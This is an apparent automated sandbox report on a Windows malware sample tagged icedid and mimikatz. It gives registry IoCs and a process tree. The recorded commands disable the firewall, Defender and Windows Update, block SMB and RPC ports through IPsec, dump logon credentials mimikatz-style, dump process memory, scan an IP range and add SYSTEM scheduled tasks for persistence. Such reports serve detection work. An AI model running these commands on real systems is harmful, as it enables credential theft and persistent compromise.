jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" fbnhtsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" fbnhtsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" fbnhtsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ fbnhtsh.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1236 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4720 2024-05-02_97247f61fafc2c9a646132fc7a2ebea2_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4720 2024-05-02_97247f61fafc2c9a646132fc7a2ebea2_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4848 fbnhtsh.exe Token: SeDebugPrivilege 1176 fbnhtsh.exe Token: SeDebugPrivilege 4292 vfshost.exe Token: SeDebugPrivilege 4256 jgannnvah.exe Token: SeLockMemoryPrivilege 3940 blbkgb.exe Token: SeLockMemoryPrivilege 3940 blbkgb.exe Token: SeDebugPrivilege 2392 jgannnvah.exe Token: SeDebugPrivilege 512 jgannnvah.exe Token: SeDebugPrivilege 2796 jgannnvah.exe Token: SeDebugPrivilege 3532 jgannnvah.exe Token: SeDebugPrivilege 4556 jgannnvah.exe Token: SeDebugPrivilege 4008 jgannnvah.exe Token: SeDebugPrivilege 2236 jgannnvah.exe Token: SeDebugPrivilege 1312 jgannnvah.exe Token: SeDebugPrivilege 3972 jgannnvah.exe Token: SeDebugPrivilege 1892 jgannnvah.exe Token: SeDebugPrivilege 1732 jgannnvah.exe Token: SeDebugPrivilege 2144 jgannnvah.exe Token: SeDebugPrivilege 2700 jgannnvah.exe Token: SeDebugPrivilege 1444 jgannnvah.exe Token: SeDebugPrivilege 4268 jgannnvah.exe Token: SeDebugPrivilege 3664 jgannnvah.exe Token: SeDebugPrivilege 3336 jgannnvah.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4720 2024-05-02_97247f61fafc2c9a646132fc7a2ebea2_hacktools_icedid_mimikatz.exe 4720 2024-05-02_97247f61fafc2c9a646132fc7a2ebea2_hacktools_icedid_mimikatz.exe 4848 fbnhtsh.exe 4848 fbnhtsh.exe 1176 fbnhtsh.exe 1176 fbnhtsh.exe 4832 xohudmc.exe 4824 lqrjma.exe 1908 fbnhtsh.exe 1908 fbnhtsh.exe 5764 fbnhtsh.exe 5764 fbnhtsh.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4720 wrote to memory of 3660 4720 2024-05-02_97247f61fafc2c9a646132fc7a2ebea2_hacktools_icedid_mimikatz.exe 85 PID 4720 wrote to memory of 3660 4720 2024-05-02_97247f61fafc2c9a646132fc7a2ebea2_hacktools_icedid_mimikatz.exe 85 PID 4720 wrote to memory of 3660 4720 2024-05-02_97247f61fafc2c9a646132fc7a2ebea2_hacktools_icedid_mimikatz.exe 85 PID 3660 wrote to memory of 1236 3660 cmd.exe 88 PID 3660 wrote to memory of 1236 3660 cmd.exe 88 PID 3660 wrote to memory of 1236 3660 cmd.exe 88 PID 3660 wrote to memory of 4848 3660 cmd.exe 97 PID 3660 wrote to memory of 4848 3660 cmd.exe 97 PID 3660 wrote to memory of 4848 3660 cmd.exe 97 PID 1176 wrote to memory of 4448 1176 fbnhtsh.exe 99 PID 1176 wrote to memory of 4448 1176 fbnhtsh.exe 99 PID 1176 wrote to memory of 4448 1176 fbnhtsh.exe 99 PID 4448 wrote to memory of 2960 4448 cmd.exe 101 PID 4448 wrote to memory of 2960 4448 cmd.exe 101 PID 4448 wrote to memory of 2960 4448 cmd.exe 101 PID 4448 wrote to memory of 3648 4448 cmd.exe 102 PID 4448 wrote to memory of 3648 4448 cmd.exe 102 PID 4448 wrote to memory of 3648 4448 cmd.exe 102 PID 4448 wrote to memory of 2040 4448 cmd.exe 103 PID 4448 wrote to memory of 2040 4448 cmd.exe 103 PID 4448 wrote to memory of 2040 4448 cmd.exe 103 PID 4448 wrote to memory of 4592 4448 cmd.exe 104 PID 4448 wrote to memory of 4592 4448 cmd.exe 104 PID 4448 wrote to memory of 4592 4448 cmd.exe 104 PID 4448 wrote to memory of 2904 4448 cmd.exe 105 PID 4448 wrote to memory of 2904 4448 cmd.exe 105 PID 4448 wrote to memory of 2904 4448 cmd.exe 105 PID 4448 wrote to memory of 2248 4448 cmd.exe 106 PID 4448 wrote to memory of 2248 4448 cmd.exe 106 PID 4448 wrote to memory of 2248 4448 cmd.exe 106 PID 1176 wrote to memory of 2192 1176 fbnhtsh.exe 107 PID 1176 wrote to memory of 2192 1176 fbnhtsh.exe 107 PID 1176 wrote to memory of 2192 1176 fbnhtsh.exe 107 PID 1176 wrote to memory of 2404 1176 fbnhtsh.exe 109 PID 1176 wrote to memory of 2404 1176 fbnhtsh.exe 109 PID 1176 wrote to memory of 2404 1176 fbnhtsh.exe 109 PID 1176 wrote to memory of 4504 1176 fbnhtsh.exe 111 PID 1176 wrote to memory of 4504 1176 fbnhtsh.exe 111 PID 1176 wrote to memory of 4504 1176 fbnhtsh.exe 111 PID 1176 wrote to memory of 3880 1176 fbnhtsh.exe 116 PID 1176 wrote to memory of 3880 1176 fbnhtsh.exe 116 PID 1176 wrote to memory of 3880 1176 fbnhtsh.exe 116 PID 3880 wrote to memory of 4608 3880 cmd.exe 118 PID 3880 wrote to memory of 4608 3880 cmd.exe 118 PID 3880 wrote to memory of 4608 3880 cmd.exe 118 PID 4608 wrote to memory of 4600 4608 wpcap.exe 119 PID 4608 wrote to memory of 4600 4608 wpcap.exe 119 PID 4608 wrote to memory of 4600 4608 wpcap.exe 119 PID 4600 wrote to memory of 1980 4600 net.exe 121 PID 4600 wrote to memory of 1980 4600 net.exe 121 PID 4600 wrote to memory of 1980 4600 net.exe 121 PID 4608 wrote to memory of 640 4608 wpcap.exe 122 PID 4608 wrote to memory of 640 4608 wpcap.exe 122 PID 4608 wrote to memory of 640 4608 wpcap.exe 122 PID 640 wrote to memory of 1416 640 net.exe 124 PID 640 wrote to memory of 1416 640 net.exe 124 PID 640 wrote to memory of 1416 640 net.exe 124 PID 4608 wrote to memory of 4892 4608 wpcap.exe 125 PID 4608 wrote to memory of 4892 4608 wpcap.exe 125 PID 4608 wrote to memory of 4892 4608 wpcap.exe 125 PID 4892 wrote to memory of 1600 4892 net.exe 127 PID 4892 wrote to memory of 1600 4892 net.exe 127 PID 4892 wrote to memory of 1600 4892 net.exe 127 PID 4608 wrote to memory of 788 4608 wpcap.exe 128
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1748
-
C:\Windows\TEMP\iaajsbnbu\blbkgb.exe"C:\Windows\TEMP\iaajsbnbu\blbkgb.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-02_97247f61fafc2c9a646132fc7a2ebea2_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-02_97247f61fafc2c9a646132fc7a2ebea2_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\zpnzavhu\fbnhtsh.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1236
-
-
C:\Windows\zpnzavhu\fbnhtsh.exeC:\Windows\zpnzavhu\fbnhtsh.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4848
-
-
-
C:\Windows\zpnzavhu\fbnhtsh.exeC:\Windows\zpnzavhu\fbnhtsh.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2960
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:3648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2040
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:4592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2904
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:2248
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:2192
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:2404
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:4504
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ivullanlc\lgbbybeij\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\ivullanlc\lgbbybeij\wpcap.exeC:\Windows\ivullanlc\lgbbybeij\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4608 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:1980
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:1416
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:1600
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:788
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:4584
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2456
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4824
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:464
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:5100
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:1892
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ivullanlc\lgbbybeij\lpcfaazhb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ivullanlc\lgbbybeij\Scant.txt2⤵PID:3120
-
C:\Windows\ivullanlc\lgbbybeij\lpcfaazhb.exeC:\Windows\ivullanlc\lgbbybeij\lpcfaazhb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ivullanlc\lgbbybeij\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3612
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ivullanlc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ivullanlc\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:2832 -
C:\Windows\ivullanlc\Corporate\vfshost.exeC:\Windows\ivullanlc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bhgtciqqn" /ru system /tr "cmd /c C:\Windows\ime\fbnhtsh.exe"2⤵PID:4836
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bhgtciqqn" /ru system /tr "cmd /c C:\Windows\ime\fbnhtsh.exe"3⤵
- Creates scheduled task(s)
PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ipnhuvzey" /ru system /tr "cmd /c echo Y|cacls C:\Windows\zpnzavhu\fbnhtsh.exe /p everyone:F"2⤵PID:4436
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ipnhuvzey" /ru system /tr "cmd /c echo Y|cacls C:\Windows\zpnzavhu\fbnhtsh.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:2364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "unvrganlb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\iaajsbnbu\blbkgb.exe /p everyone:F"2⤵PID:4916
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "unvrganlb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\iaajsbnbu\blbkgb.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:640
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:4444
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:4660
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3864
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2732
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:4256
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:4484
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4196
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:1104
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:5100
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:3596
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4680
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:3004
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:4360
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:3944
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:1872
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:2308
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:4460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:3104
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:4292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:4520
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:2144
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:4420
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:1908
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:4804
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:4572
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:4720
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:2028
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:4376
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:1632
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:2180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:3496
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:1200
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:2364
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:1660
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:4620
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4832
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 800 C:\Windows\TEMP\ivullanlc\800.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4256
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 380 C:\Windows\TEMP\ivullanlc\380.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 1748 C:\Windows\TEMP\ivullanlc\1748.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:512
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 2580 C:\Windows\TEMP\ivullanlc\2580.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 2776 C:\Windows\TEMP\ivullanlc\2776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3532
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 2800 C:\Windows\TEMP\ivullanlc\2800.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4556
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 3020 C:\Windows\TEMP\ivullanlc\3020.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4008
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 3780 C:\Windows\TEMP\ivullanlc\3780.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 3868 C:\Windows\TEMP\ivullanlc\3868.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 3928 C:\Windows\TEMP\ivullanlc\3928.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3972
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 4020 C:\Windows\TEMP\ivullanlc\4020.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 3620 C:\Windows\TEMP\ivullanlc\3620.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 4068 C:\Windows\TEMP\ivullanlc\4068.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 4852 C:\Windows\TEMP\ivullanlc\4852.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 2708 C:\Windows\TEMP\ivullanlc\2708.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 1996 C:\Windows\TEMP\ivullanlc\1996.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4268
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 3564 C:\Windows\TEMP\ivullanlc\3564.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3664
-
-
C:\Windows\TEMP\ivullanlc\jgannnvah.exeC:\Windows\TEMP\ivullanlc\jgannnvah.exe -accepteula -mp 3648 C:\Windows\TEMP\ivullanlc\3648.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3336
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\ivullanlc\lgbbybeij\scan.bat2⤵PID:960
-
